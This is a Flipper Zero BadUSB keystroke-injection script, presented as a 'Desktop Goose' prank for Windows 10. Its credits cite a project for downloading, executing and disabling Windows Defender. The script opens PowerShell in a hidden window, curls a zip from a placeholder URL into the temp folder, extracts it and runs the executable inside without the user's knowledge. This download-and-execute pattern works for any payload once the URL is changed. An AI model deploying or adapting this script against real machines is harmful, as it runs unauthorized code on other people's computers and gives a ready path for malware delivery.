Flipper/BadUSB/Honk.txt

18 lines
992 B
Plaintext
Raw Normal View History

2022-08-21 10:04:57 +00:00
REM Title: Desktop Goose
REM Author: FalsePhilosopher
REM Target: Windows 10+
2022-08-28 17:03:14 +00:00
REM Props: Hak5, https://samperson.itch.io/desktop-goose for the honks,Jakoby for some PS bits I used from ADV-Rickroll https://github.com/I-Am-Jakoby, 3ctOs for the PS bits I used https://github.com/3ct0s/badusb-download-execute-disable-windows-defender and memes
2022-08-21 10:04:57 +00:00
REM Version: 1.0
REM Category: Prank
2022-08-28 17:03:14 +00:00
REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? The creator of desktop goose told me I CAN NOT redistribute his binary. So you need to host your own desktop goose zip named dg.zip
2022-08-21 10:04:57 +00:00
REM
REM startup delay
DELAY 300
GUI r
DELAY 500
STRING powershell
2022-08-21 17:56:39 +00:00
ENTER
2022-08-21 10:04:57 +00:00
DELAY 2000
2022-08-28 17:03:14 +00:00
STRING powershell -w h ($Z="$env:TMP"+'\dg.zip');$D="$env:TMP"+'\dg';curl linktodesktopgoose.zip -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
2022-08-21 10:04:57 +00:00
ENTER